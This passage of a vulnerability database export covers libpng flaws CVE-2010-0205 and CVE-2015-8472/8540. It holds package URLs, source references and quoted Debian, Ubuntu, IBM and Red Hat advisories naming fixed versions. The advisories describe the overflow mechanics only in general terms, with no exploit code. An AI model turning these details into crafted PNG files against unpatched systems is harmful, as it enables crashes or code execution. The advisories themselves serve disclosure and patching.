"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.1_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.2_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.5_i386.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.27-1ubuntu0.2_i386.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.5_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.2_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.27-2ubuntu2.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.1_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-1ubuntu0.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.1_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.5_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-1ubuntu0.2.dsc"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.5_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.2_lpia.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.1_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.5_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.5_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.27-1ubuntu0.2_lpia.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-3ubuntu0.2.dsc"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.5_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.5_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.5_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-2ubuntu2.1.diff.gz"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-1ubuntu0.2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.27-1ubuntu0.2_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.5_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-3ubuntu0.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.37-1ubuntu0.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.1_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-1ubuntu0.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.37-1ubuntu0.1.diff.gz"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.1_lpia.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.27-1ubuntu0.2_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-1ubuntu0.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.15~beta5-3ubuntu0.2_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.1_i386.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.5.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-2ubuntu2.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.27-1ubuntu0.2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.2_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.37-1ubuntu0.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.27-1ubuntu0.2.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-3ubuntu0.2_i386.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.27-1ubuntu0.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.5_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-1ubuntu0.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.5_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.27-2ubuntu2.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.37-1ubuntu0.1_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-dev_1.2.37-1ubuntu0.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.27-1ubuntu0.2_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0-udeb_1.2.27-2ubuntu2.1_i386.udeb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-3ubuntu0.2_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny3.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_amd64.udeb"
},
{
"trust": 0.1,
"url": "http://secunia.com/"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_amd64.deb"
},
{
"trust": 0.1,
"url": "http://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_mipsel.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny3_all.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_i386.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_hppa.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_mipsel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_ia64.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_sparc.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_armel.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_alpha.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_hppa.udeb"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_alpha.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_s390.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny3.dsc"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_powerpc.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_ia64.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_alpha.deb"
},
{
"trust": 0.1,
"url": "http://packages.debian.org/\u003cpkg\u003e"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_arm.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_armel.deb"
},
{
"trust": 0.1,
"url": "http://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny3_arm.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny3_armel.udeb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_s390.deb"
},
{
"trust": 0.1,
"url": "http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny3_hppa.deb"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#576029"
},
{
"db": "VULHUB",
"id": "VHN-42810"
},
{
"db": "VULMON",
"id": "CVE-2010-0205"
},
{
"db": "BID",
"id": "38478"
},
{
"db": "PACKETSTORM",
"id": "94522"
},
{
"db": "PACKETSTORM",
"id": "94244"
},
{
"db": "PACKETSTORM",
"id": "87569"
},
{
"db": "PACKETSTORM",
"id": "87557"
},
{
"db": "PACKETSTORM",
"id": "87345"
},
{
"db": "PACKETSTORM",
"id": "88286"
},
{
"db": "CNNVD",
"id": "CNNVD-201003-024"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001158"
},
{
"db": "NVD",
"id": "CVE-2010-0205"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#576029"
},
{
"db": "VULHUB",
"id": "VHN-42810"
},
{
"db": "VULMON",
"id": "CVE-2010-0205"
},
{
"db": "BID",
"id": "38478"
},
{
"db": "PACKETSTORM",
"id": "94522"
},
{
"db": "PACKETSTORM",
"id": "94244"
},
{
"db": "PACKETSTORM",
"id": "87569"
},
{
"db": "PACKETSTORM",
"id": "87557"
},
{
"db": "PACKETSTORM",
"id": "87345"
},
{
"db": "PACKETSTORM",
"id": "88286"
},
{
"db": "CNNVD",
"id": "CNNVD-201003-024"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-001158"
},
{
"db": "NVD",
"id": "CVE-2010-0205"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-03-02T00:00:00",
"db": "CERT/CC",
"id": "VU#576029"
},
{
"date": "2010-03-03T00:00:00",
"db": "VULHUB",
"id": "VHN-42810"
},
{
"date": "2010-03-03T00:00:00",
"db": "VULMON",
"id": "CVE-2010-0205"
},
{
"date": "2010-03-02T00:00:00",
"db": "BID",
"id": "38478"
},
{
"date": "2010-10-05T22:16:57",
"db": "PACKETSTORM",
"id": "94522"
},
{
"date": "2010-09-25T18:50:30",
"db": "PACKETSTORM",
"id": "94244"
},
{
"date": "2010-03-23T23:16:59",
"db": "PACKETSTORM",
"id": "87569"
},
{
"date": "2010-03-23T22:20:24",
"db": "PACKETSTORM",
"id": "87557"
},
{
"date": "2010-03-17T00:04:21",
"db": "PACKETSTORM",
"id": "87345"
},
{
"date": "2010-04-13T00:25:27",
"db": "PACKETSTORM",
"id": "88286"
},
{
"date": "2010-03-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201003-024"
},
{
"date": "2010-03-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-001158"
},
{
"date": "2010-03-03T19:30:00.493000",
"db": "NVD",
"id": "CVE-2010-0205"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-03-02T00:00:00",
"db": "CERT/CC",
"id": "VU#576029"
},
{
"date": "2020-08-07T00:00:00",
"db": "VULHUB",
"id": "VHN-42810"
},
{
"date": "2020-08-07T00:00:00",
"db": "VULMON",
"id": "CVE-2010-0205"
},
{
"date": "2015-04-13T20:16:00",
"db": "BID",
"id": "38478"
},
{
"date": "2020-08-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201003-024"
},
{
"date": "2012-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2010-001158"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2010-0205"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "87569"
},
{
"db": "CNNVD",
"id": "CNNVD-201003-024"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "libpng stalls on highly compressed ancillary chunks",
"sources": [
{
"db": "CERT/CC",
"id": "VU#576029"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201003-024"
}
],
"trust": 0.6
}
}
VAR-201601-0495
Vulnerability from variot - Updated: 2026-03-09 22:17Buffer overflow in the png_set_PLTE function in libpng before 1.0.65, 1.1.x and 1.2.x before 1.2.55, 1.3.x, 1.4.x before 1.4.18, 1.5.x before 1.5.25, and 1.6.x before 1.6.20 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a small bit-depth value in an IHDR (aka image header) chunk in a PNG image. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-8126. The following versions are affected: libpng prior to 1.0.65, 1.1.x and 1.2.x prior to 1.2.55, 1.3.x, 1.4.x prior to 1.4.18, 1.5.x prior to 1.5.25, 1.6 1.6.x versions prior to .20. The Common Vulnerabilities and Exposures project identifies the following problems:
CVE-2015-8472
It was discovered that the original fix for CVE-2015-8126 was
incomplete and did not detect a potential overrun by applications
using png_set_PLTE directly. A remote attacker can take advantage of
this flaw to cause a denial of service (application crash).
CVE-2015-8540
Xiao Qixue and Chen Yu discovered a flaw in the png_check_keyword
function. A remote attacker can potentially take advantage of this
flaw to cause a denial of service (application crash).
For the oldstable distribution (wheezy), these problems have been fixed in version 1.2.49-1+deb7u2.
For the stable distribution (jessie), these problems have been fixed in version 1.2.50-2+deb8u2. 7) - x86_64
- Description:
IBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.
This update fixes several vulnerabilities in the IBM Java Runtime Environment and the IBM Java Software Development Kit. Further information about these flaws can be found on the IBM Java Security alerts page, listed in the References section. (CVE-2015-5041, CVE-2015-7575, CVE-2015-7981, CVE-2015-8126, CVE-2015-8472, CVE-2015-8540, CVE-2016-0402, CVE-2016-0448, CVE-2016-0466, CVE-2016-0483, CVE-2016-0494)
Note: This update also disallows the use of the MD5 hash algorithm in the certification path processing. The use of MD5 can be re-enabled by removing MD5 from the jdk.certpath.disabledAlgorithms security property defined in the java.security file. All running instances of IBM Java must be restarted for the update to take effect. Bugs fixed (https://bugzilla.redhat.com/):
1276416 - CVE-2015-7981 libpng: Out-of-bounds read in png_convert_to_rfc1123 1281756 - CVE-2015-8126 CVE-2015-8472 libpng: Buffer overflow vulnerabilities in png_get_PLTE/png_set_PLTE functions 1289841 - CVE-2015-7575 TLS 1.2 Transcipt Collision attacks against MD5 in key exchange protocol (SLOTH) 1291312 - CVE-2015-8540 libpng: underflow read in png_check_keyword() 1298906 - CVE-2016-0494 ICU: integer signedness issue in IndicRearrangementProcessor (OpenJDK 2D, 8140543) 1298957 - CVE-2016-0402 OpenJDK: URL deserialization inconsistencies (Networking, 8059054) 1299073 - CVE-2016-0448 OpenJDK: logging of RMI connection secrets (JMX, 8130710) 1299385 - CVE-2016-0466 OpenJDK: insufficient enforcement of totalEntitySizeLimit (JAXP, 8133962) 1299441 - CVE-2016-0483 OpenJDK: incorrect boundary check in JPEG decoder (AWT, 8139017) 1302689 - CVE-2015-5041 IBM JDK: J9 JVM allows code to invoke non-public interface methods
- ============================================================================ Ubuntu Security Notice USN-2861-1 January 06, 2016
libpng vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.10
- Ubuntu 15.04
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
libpng could be made to crash or run programs as your login if it opened a specially crafted file. (CVE-2015-8540)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.10: libpng12-0 1.2.51-0ubuntu3.15.10.2
Ubuntu 15.04: libpng12-0 1.2.51-0ubuntu3.15.04.2
Ubuntu 14.04 LTS: libpng12-0 1.2.50-1ubuntu2.14.04.2
Ubuntu 12.04 LTS: libpng12-0 1.2.46-3ubuntu4.2
After a standard system update you need to restart your session to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: libpng security update Advisory ID: RHSA-2015:2594-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2594.html Issue date: 2015-12-09 CVE Names: CVE-2015-7981 CVE-2015-8126 CVE-2015-8472 =====================================================================
- Summary:
Updated libpng packages that fix three security issues are now available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
The libpng packages contain a library of functions for creating and manipulating PNG (Portable Network Graphics) image format files.
It was discovered that the png_get_PLTE() and png_set_PLTE() functions of libpng did not correctly calculate the maximum palette sizes for bit depths of less than 8. In case an application tried to use these functions in combination with properly calculated palette sizes, this could lead to a buffer overflow or out-of-bounds reads. An attacker could exploit this to cause a crash or potentially execute arbitrary code by tricking an unsuspecting user into processing a specially crafted PNG image. However, the exact impact is dependent on the application using the library. (CVE-2015-8126, CVE-2015-8472)
An array-indexing error was discovered in the png_convert_to_rfc1123() function of libpng. An attacker could possibly use this flaw to cause an out-of-bounds read by tricking an unsuspecting user into processing a specially crafted PNG image. (CVE-2015-7981)
All libpng users are advised to upgrade to these updated packages, which contain backported patches to correct these issues.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1276416 - CVE-2015-7981 libpng: Out-of-bounds read in png_convert_to_rfc1123 1281756 - CVE-2015-8126 CVE-2015-8472 libpng: Buffer overflow vulnerabilities in png_get_PLTE/png_set_PLTE functions
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: libpng-1.2.49-2.el6_7.src.rpm
i386: libpng-1.2.49-2.el6_7.i686.rpm libpng-debuginfo-1.2.49-2.el6_7.i686.rpm
x86_64: libpng-1.2.49-2.el6_7.i686.rpm libpng-1.2.49-2.el6_7.x86_64.rpm libpng-debuginfo-1.2.49-2.el6_7.i686.rpm libpng-debuginfo-1.2.49-2.el6_7.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: libpng-debuginfo-1.2.49-2.el6_7.i686.rpm libpng-devel-1.2.49-2.el6_7.i686.rpm libpng-static-1.2.49-2.el6_7.i686.rpm
x86_64: libpng-debuginfo-1.2.49-2.el6_7.i686.rpm libpng-debuginfo-1.2.49-2.el6_7.x86_64.rpm libpng-devel-1.2.49-2.el6_7.i686.rpm libpng-devel-1.2.49-2.el6_7.x86_64.rpm libpng-static-1.2.49-2.el6_7.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: libpng-1.2.49-2.el6_7.src.rpm
x86_64: libpng-1.2.49-2.el6_7.i686.rpm libpng-1.2.49-2.el6_7.x86_64.rpm libpng-debuginfo-1.2.49-2.el6_7.i686.rpm libpng-debuginfo-1.2.49-2.el6_7.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: libpng-debuginfo-1.2.49-2.el6_7.i686.rpm libpng-debuginfo-1.2.49-2.el6_7.x86_64.rpm libpng-devel-1.2.49-2.el6_7.i686.rpm libpng-devel-1.2.49-2.el6_7.x86_64.rpm libpng-static-1.2.49-2.el6_7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: libpng-1.2.49-2.el6_7.src.rpm
i386: libpng-1.2.49-2.el6_7.i686.rpm libpng-debuginfo-1.2.49-2.el6_7.i686.rpm libpng-devel-1.2.49-2.el6_7.i686.rpm
